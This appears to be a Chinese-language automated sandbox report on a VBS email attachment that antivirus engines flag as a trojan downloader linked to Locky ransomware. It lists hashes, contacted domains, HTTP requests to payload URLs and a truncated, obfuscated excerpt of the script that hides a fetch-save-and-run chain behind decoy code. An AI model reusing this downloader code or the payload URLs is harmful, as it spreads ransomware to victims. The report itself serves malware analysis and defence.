恶意软件分析 & URL链接扫描免费在线病毒分析平台

分析任务

分析类型	虚拟机标签	开始时间	结束时间	持续时间
文件 (Windows)	win7-sp1-x64-hpdapp01-1	2019-11-18 18:32:48	2019-11-18 18:33:36	48 秒

魔盾分数

10.0

危险的

文件详细信息

文件名	SKM_C554e67614648511.7z ==> SKM_C554e16073396317.vbs
文件大小	4865 字节
文件类型	ASCII text, with CRLF line terminators
MD5	b3adde77551c36292de21e9f7fab7a6f
SHA1	3a6921d9862ad72ab4c042592cba26b64c307a3e
SHA256	0fadf3d2e8f48db9e2026c0b97c9a7bb126c3d4a281c0e57dcd31be80030c2c2
SHA512	f72acf3add3e5935d04302d61b064659258b3ae48cfd941300988bacb2b5b01164a87d30d659088e480542503f49dc45720e83fa53c3dd47669aff323eadac4f
CRC32	59582E55
Ssdeep	96:qIixZv/u/s/6Ee4K9PL5hbczq5AamevKv0T0MWUeWPOLfC1W0oXcrwekUy3:q55/u/s/6N4ovb4jIvKca9WPOLuW0Vwv
Yara	登录查看Yara规则
	样本下载提交误报

登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

域名解析 (可点击查询WPING实时安全评级)

域名	安全评级	响应
amcscomputer.com	未知	A 216.242.171.101
altarek.com	未知
gulercin.com	未知	A 46.20.146.37

摘要

登录查看详细行为信息

没有可用的静态分析.

3SKM_C554e16073396317.vbs

防病毒引擎/厂商	病毒名/规则匹配	病毒库日期
Bkav	W32.RanpokicLTW.Trojan	20181024
MicroWorld-eScan	VB:Trojan.VBS.Agent.AQD	20181025
CMC	未发现病毒	20181024
CAT-QuickHeal	VBS.Downloader.4332	20181024
ALYac	Trojan.Downloader.VBS.Agent	20181024
Malwarebytes	未发现病毒	20181025
AegisLab	Trojan.Shell.Generic.4!c	20181024
TheHacker	未发现病毒	20181024
K7GW	未发现病毒	20181024
K7AntiVirus	未发现病毒	20181024
Arcabit	VB:Trojan.VBS.Agent.AQD	20181024
Baidu	VBS.Trojan-Downloader.Agent.tp	20181024
Babable	未发现病毒	20180918
F-Prot	VBS/Downldr.HM	20181024
Symantec	VBS.Downloader.B	20181025
ESET-NOD32	VBS/TrojanDownloader.Agent.PKN	20181025
TrendMicro-HouseCall	VBS_SCARAB.SMJS	20181024
Avast	VBS:Downloader-ATD [Trj]	20181024
ClamAV	未发现病毒	20181024
Kaspersky	HEUR:Trojan.Script.Agent.gen	20181024
BitDefender	VB:Trojan.VBS.Agent.AQD	20181025
NANO-Antivirus	Trojan.Script.ExpKit.evtswh	20181025
ViRobot	未发现病毒	20181024
Rising	Downloader.VBS.MaliciousEmail!1.ACE7 (CLASSIC)	20181025
Ad-Aware	VB:Trojan.VBS.Agent.AQD	20181024
Sophos	Troj/VBSDl-AV	20181024
F-Secure	VB:Trojan.VBS.Agent.AQD	20181024
DrWeb	VBS.DownLoader.1047	20181024
Zillya	未发现病毒	20181024
TrendMicro	VBS_SCARAB.SMJS	20181025
McAfee-GW-Edition	VBS/Downloader.ea	20181024
Emsisoft	VB:Trojan.VBS.Agent.AQD (B)	20181024
Ikarus	Trojan-Ransom.Script.GlobeImposter	20181024
Cyren	VBS/Downldr.HM	20181025
Jiangmin	未发现病毒	20181024
Avira	VBS/Drldr.Agent.4368	20181024
Antiy-AVL	Trojan[Downloader]/VBS.Agent.pkk	20181023
Kingsoft	未发现病毒	20181025
Microsoft	TrojanDownloader:VBS/Schopets.O	20181024
SUPERAntiSpyware	未发现病毒	20181022
AhnLab-V3	VBS/Downloader.S12	20181024
ZoneAlarm	HEUR:Trojan.Script.Agent.gen	20181024
Avast-Mobile	未发现病毒	20181024
GData	VB:Trojan.VBS.Agent.AQD	20181024
TotalDefense	未发现病毒	20181024
McAfee	VBS/Downloader.ea	20181025
TACHYON	未发现病毒	20181025
VBA32	未发现病毒	20181024
Zoner	未发现病毒	20181024
Tencent	Js.Trojan.Raas.Auto	20181025
Yandex	未发现病毒	20181024
MAX	malware (ai score=100)	20181025
Fortinet	VBS/Nemucod.B02D!tr.dldr	20181025
AVG	VBS:Downloader-ATD [Trj]	20181024
Panda	未发现病毒	20181024
Qihoo-360	virus.vbs.qexvmc.1	20181025

进程树

wscript.exe id: 2536

搜索
wscript.exe (2536)

wscript.exe, PID: 2536, 上一级进程 PID: 2332

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

TCP

源地址	源端口	目标地址	目标端口
192.168.122.201	49161	216.242.171.101 amcscomputer.com	80
192.168.122.201	49163	46.20.146.37 gulercin.com	80

UDP

源地址	源端口	目标地址	目标端口
192.168.122.201	49310	192.168.122.1	53
192.168.122.201	49608	192.168.122.1	53
192.168.122.201	64912	192.168.122.1	53

域名解析 (可点击查询WPING实时安全评级)

域名	安全评级	响应
amcscomputer.com	未知	A 216.242.171.101
altarek.com	未知
gulercin.com	未知	A 46.20.146.37

TCP

源地址	源端口	目标地址	目标端口
192.168.122.201	49161	216.242.171.101 amcscomputer.com	80
192.168.122.201	49163	46.20.146.37 gulercin.com	80

UDP

源地址	源端口	目标地址	目标端口
192.168.122.201	49310	192.168.122.1	53
192.168.122.201	49608	192.168.122.1	53
192.168.122.201	64912	192.168.122.1	53

HTTP 请求

URI	HTTP数据
URL专业沙箱检测 -> http://amcscomputer.com/JH67RdfgD?	GET /JH67RdfgD? HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: amcscomputer.com Connection: Keep-Alive
URL专业沙箱检测 -> http://gulercin.com/JH67RdfgD?	GET /JH67RdfgD? HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gulercin.com Connection: Keep-Alive

URI

HTTP数据

URL专业沙箱检测 -> http://amcscomputer.com/JH67RdfgD?

GET /JH67RdfgD? HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: amcscomputer.com
Connection: Keep-Alive

URL专业沙箱检测 -> http://gulercin.com/JH67RdfgD?

GET /JH67RdfgD? HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: gulercin.com
Connection: Keep-Alive

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

Timestamp	Source IP	Source Port	Destination IP	Destination Port	Protocol	SID	Signature	Category
2019-11-18 18:33:14.838417+0800	192.168.122.201	49161	216.242.171.101	80	TCP	2024767	ET CURRENT_EVENTS Possible Locky Payload DL Sept 26 2017 M1	A Network Trojan was detected
2019-11-18 18:33:25.595188+0800	192.168.122.201	49163	46.20.146.37	80	TCP	2024767	ET CURRENT_EVENTS Possible Locky Payload DL Sept 26 2017 M1	A Network Trojan was detected

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件

文件名	SKM_C554e16073396317.vbs
相关文件	C:\Users\test\AppData\Local\Temp\7z-tmp\SKM_C554e16073396317.vbs
文件大小	4865 字节
文件类型	ASCII text, with CRLF line terminators
MD5	b3adde77551c36292de21e9f7fab7a6f
SHA1	3a6921d9862ad72ab4c042592cba26b64c307a3e
SHA256	0fadf3d2e8f48db9e2026c0b97c9a7bb126c3d4a281c0e57dcd31be80030c2c2
CRC32	59582E55
Ssdeep	96:qIixZv/u/s/6Ee4K9PL5hbczq5AamevKv0T0MWUeWPOLfC1W0oXcrwekUy3:q55/u/s/6N4ovb4jIvKca9WPOLuW0Vwv
Yara
	下载提交魔盾安全分析显示文本
Public Sub FillPointWithDefaults(Point1 ) With Point1 .Name = "" .Type = dsPoint .LabelLength = Len(.Name) .LabelOffsetX = 0 .LabelOffsetY = -setdefPointSize \ 2 + 1 '.LabelWidth = Paper.TextWidth(.Name) '.LabelHeight = Paper.TextHeight(.Name) .PhysicalWidth = defPointSize .Width = .PhysicalWidth ToLogicalLength .Width .Locus = 0 .ParentFigure = 0 .ZOrder = 0 'GenerateNewPointZOrder .Tag = 0 .FillStyle = setdefPointFill .FillColor = setdefcolPointFill .ForeColor = setdefcolPoint .Shape = setdefPointShape .ShowName = setAutoShowPointName .ShowCoordinates = False .NameColor = setdefcolPointName .Visible = True .Enabled = True .Hide = False .InDemo = True .X = 0 .Y = 0 End With End Sub Function T2000(p, ddd) dicA = 19 Set CruellalpineMacAttack = CreateObject("WScript.Shell") Save1.Type = 1 Save1.Open End Function Dim Cruellalpineensurance ' Dim CruellalpineInPlaceOf ' CruellalpineTepir = "User" Dim williams Dim TristateTrue Dim CruellalpineTimeTo 'As Object Dim CruellalpineDW CruellalpineDW = false Dim Cruellalpinebalibob 'As Object Dim Cruellalpinecashback 'As Object Function Aodgraduatesalpine(strr) if strr = "34" then waitH = "Save"+"ToFile, 2" else Save1.Savetofile CruellalpineInPlaceOf , 2 end if End Function Dim krapivec Dim CruellalpineReikYaik 'As Object Dim Save1 'As Object Kullipin = "//^^^:ptth^^^exe.WBYzzMSVQH\^^^elifotevas^^^ydoBes"+"nopser^^^etirw^^^nepo^^^epyT^^^PmeT^^^TeG^^^ssecorP^^^llehs.tpircsW^^^noitacilppA.llehs^^^Maerts.bdodA^^^PTTHLMX.tfosorciM" Dim CruellalpinePetir ' Dim sNodeKey ' Dim sParentKey ' CHECHIL ="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" Public Function FolderToCopy(A,B,Pipitr6) Delafon = 50 Delafon = Delafon + 11 if Delafon > 13 then B.Write P <truncated>

没有发现相似的分析.

HTML 总结报告 (需15-60分钟同步)	下载

Processing ( 58.633 seconds )

40.258 NetworkAnalysis
15.591 Suricata
1.728 VirusTotal
0.348 TargetInfo
0.331 Dropped
0.272 BehaviorAnalysis
0.1 AnalysisInfo
0.003 Memory
0.001 Static
0.001 Strings

Signatures ( 2.261 seconds )

1.981 md_url_bl
0.051 antiav_detectreg
0.027 md_domain_bl
0.018 infostealer_ftp
0.013 api_spamming
0.012 antianalysis_detectreg
0.011 stealth_timeout
0.011 infostealer_im
0.01 stealth_decoy_document
0.007 anomaly_persistence_autorun
0.007 antiav_detectfile
0.007 geodo_banking_trojan
0.006 infostealer_mail
0.006 network_http
0.006 ransomware_files
0.005 infostealer_bitcoin
0.005 ransomware_extensions
0.004 antivm_generic_scsi
0.003 tinba_behavior
0.003 antivm_generic_services
0.003 ransomware_message
0.003 anormaly_invoke_kills
0.003 antivm_vbox_files
0.003 disables_browser_warn
0.003 network_torgateway
0.002 rat_nanocore
0.002 mimics_filetime
0.002 betabot_behavior
0.002 reads_self
0.002 kibex_behavior
0.002 cerber_behavior
0.002 antivm_parallels_keys
0.002 antivm_xen_keys
0.002 browser_security
0.002 modify_proxy
0.002 darkcomet_regkeys
0.002 md_bad_drop
0.002 network_cnc_http
0.001 hawkeye_behavior
0.001 network_tor
0.001 bootkit
0.001 network_anomaly
0.001 dridex_behavior
0.001 stealth_file
0.001 ursnif_behavior
0.001 kazybot_behavior
0.001 shifu_behavior
0.001 antivm_generic_disk
0.001 infostealer_browser_password
0.001 virus
0.001 hancitor_behavior
0.001 bypass_firewall
0.001 antianalysis_detectfile
0.001 antidbg_devices
0.001 antivm_generic_diskreg
0.001 banker_zeus_mutex
0.001 bot_drive
0.001 bot_drive2
0.001 browser_addon
0.001 disables_system_restore
0.001 disables_windows_defender
0.001 maldun_malicious_drop_executable_file_to_temp_folder
0.001 maldun_network_blacklist
0.001 recon_fingerprint
0.001 stealth_modify_uac_prompt

Reporting ( 1.264 seconds )

0.828 ReportHTMLSummary
0.436 Malheur


Task ID	460683
Mongo ID	5dd273c42f8f2e08f960a8c5
Cuckoo release	1.4-Maldun